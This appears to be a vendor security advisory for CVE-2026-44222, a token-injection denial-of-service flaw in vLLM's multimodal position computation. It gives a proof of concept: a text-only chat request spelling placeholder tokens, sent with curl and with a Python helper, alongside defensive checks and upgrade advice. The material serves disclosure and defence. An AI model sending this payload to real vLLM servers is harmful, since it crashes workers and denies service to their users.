CVE-2026-44222

CVE-2026-44222 is a medium-severity security vulnerability in vllm (pip), affecting versions >= 0.6.1, < 0.20.0. It is fixed in 0.20.0.

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. When image or video placeholder sequences are supplied without matching data, vLLM indexes into empty grids during input-position computation, raising an unhandled IndexError that terminates the worker or degrades availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. The original report rates the severity as High (remote DoS); the published CVSS score is 6.5 (Medium). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

  • Affected component: multimodal input position computation.
  • File/functions (paths are indicative):
    • vllm/model_executor/layers/rotary_embedding.py
      • get_input_positions_tensor(...)
      • _vl_get_input_positions_tensor(...)
  • Failure mechanism:
    • The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
    • When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
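
The failure mechanism described above can be illustrated with a minimal sketch that does not depend on vLLM. The function names, the token id value, and the list-based grid are assumptions made for illustration; this is not vLLM's actual code, and the checked variant is not necessarily how the upstream fix works.

```python
# Arbitrary stand-in for the video placeholder token id (assumption);
# the real id comes from the model configuration.
VIDEO_TOKEN_ID = 9001


def grid_dims_unchecked(input_tokens, video_grid_thw):
    """Return one (t, h, w) tuple per video placeholder, with no bounds check."""
    video_nums = sum(1 for tok in input_tokens if tok == VIDEO_TOKEN_ID)
    dims = []
    for video_index in range(video_nums):
        # Raises IndexError when placeholders outnumber grid entries.
        t, h, w = video_grid_thw[video_index]
        dims.append((t, h, w))
    return dims


def grid_dims_checked(input_tokens, video_grid_thw):
    """Same lookup, but reject inputs whose placeholders lack grid data."""
    video_nums = sum(1 for tok in input_tokens if tok == VIDEO_TOKEN_ID)
    if video_nums > len(video_grid_thw):
        raise ValueError(
            f"{video_nums} video placeholder(s) but only "
            f"{len(video_grid_thw)} grid entr(ies) supplied"
        )
    return [tuple(video_grid_thw[i]) for i in range(video_nums)]
```

With a placeholder token and an empty grid, the unchecked variant fails with IndexError, while the checked variant raises a ValueError that a request handler could map to a client error instead of a server fault.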

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

  • vLLM: 0.10.0
  • Model: Qwen/Qwen2.5-VL-3B-Instruct
  • Launch server:
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

  • HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
  • In some deployments, the worker exits and capacity remains reduced until manual restart.
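
The same request can be sent from Python, which may be convenient for a regression check against a patched server. This is a sketch using only the standard library; the helper names `build_payload` and `post_chat` and the timeout value are assumptions, while the model name, endpoint, and prompt text are taken from the PoC.

```python
import json
import urllib.error
import urllib.request

MODEL = "Qwen/Qwen2.5-VL-3B-Instruct"
PLACEHOLDER_TEXT = "what's in picture <|vision_start|><|image_pad|><|vision_end|>"


def build_payload(model=MODEL, text=PLACEHOLDER_TEXT):
    """Build the text-only chat request from the PoC (no image or video data)."""
    return {
        "model": model,
        "messages": [
            {"role": "user", "content": [{"type": "text", "text": text}]}
        ],
    }


def post_chat(payload, base_url="http://127.0.0.1:8000", timeout=30):
    """POST the payload and return the HTTP status code, including error codes."""
    req = urllib.request.Request(
        base_url + "/v1/chat/completions",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        # urllib raises on 4xx/5xx; the status code is what we want to inspect.
        return err.code
```

Per the observed result above, `post_chat(build_payload())` is expected to return 500 against an affected server.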

Fixes

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)

Impact

  • Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
  • Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
  • Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
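
Because the scope covers any front end that forwards raw user text, a proxy could flag requests whose text parts spell placeholder tokens before they reach vLLM. The sketch below is an assumption of this write-up, not the upstream fix: the helper names are hypothetical, and the token list contains only the strings from the PoC, so it would need extending for other models.

```python
# Placeholder strings taken from the PoC request. The full set is
# model-specific (assumption) and should be extended per deployed VLM.
PLACEHOLDER_TOKENS = ("<|vision_start|>", "<|image_pad|>", "<|vision_end|>")


def text_parts(message):
    """Collect the text fragments of one OpenAI-style chat message."""
    content = message.get("content")
    if isinstance(content, str):
        return [content]
    return [
        part.get("text", "")
        for part in content or []
        if isinstance(part, dict) and part.get("type") == "text"
    ]


def has_raw_placeholder(messages):
    """Return True if any text fragment contains a placeholder token string."""
    return any(
        token in text
        for message in messages
        for text in text_parts(message)
        for token in PLACEHOLDER_TOKENS
    )
```

A gateway could reject or log requests for which `has_raw_placeholder` returns True. This check only looks at literal strings, so it is a stopgap at best and does not replace upgrading.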

CVE-2026-44222 has a CVSS score of 6.5 (Medium). The attack vector is network-reachable, requires low privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.20.0); upgrading removes the vulnerable code path.

Affected versions

vllm (>= 0.6.1, < 0.20.0)

Security releases

vllm → 0.20.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade vllm to 0.20.0 or later to resolve this vulnerability.
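
To check whether an environment falls in the affected range (>= 0.6.1, < 0.20.0), a small script along these lines may help. It is a sketch: the helper names are hypothetical, and the parser compares only the numeric release segment, so pre-release or local suffixes such as "rc1" are ignored.

```python
import re
from importlib import metadata

AFFECTED_MIN = (0, 6, 1)  # inclusive lower bound from the advisory
FIXED_IN = (0, 20, 0)     # first fixed release (exclusive upper bound)


def release_tuple(version):
    """Parse the leading 'X.Y[.Z]' of a version string into a 3-tuple of ints."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(g) if g is not None else 0 for g in match.groups())


def is_affected(version):
    """Return True if the version lies in the advisory's affected range."""
    return AFFECTED_MIN <= release_tuple(version) < FIXED_IN


def installed_vllm_version():
    """Return the installed vllm version string, or None if it is not installed."""
    try:
        return metadata.version("vllm")
    except metadata.PackageNotFoundError:
        return None
```

For example, `is_affected(installed_vllm_version())` can be called once `installed_vllm_version()` is known to return a string rather than None.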

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-44222? CVE-2026-44222 is a medium-severity security vulnerability in vllm (pip), affecting versions >= 0.6.1, < 0.20.0. It is fixed in 0.20.0.
  2. How severe is CVE-2026-44222? CVE-2026-44222 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of vllm are affected by CVE-2026-44222? vllm (pip) versions >= 0.6.1, < 0.20.0 are affected.
  4. Is there a fix for CVE-2026-44222? Yes. CVE-2026-44222 is fixed in 0.20.0. Upgrade to this version or later.
  5. Is CVE-2026-44222 exploitable, and should I be worried? Whether CVE-2026-44222 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-44222 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44222? Upgrade vllm to 0.20.0 or later.

Other vulnerabilities in vllm

CVE-2026-54233, CVE-2026-54236, CVE-2026-53923, CVE-2026-12491, CVE-2026-48746
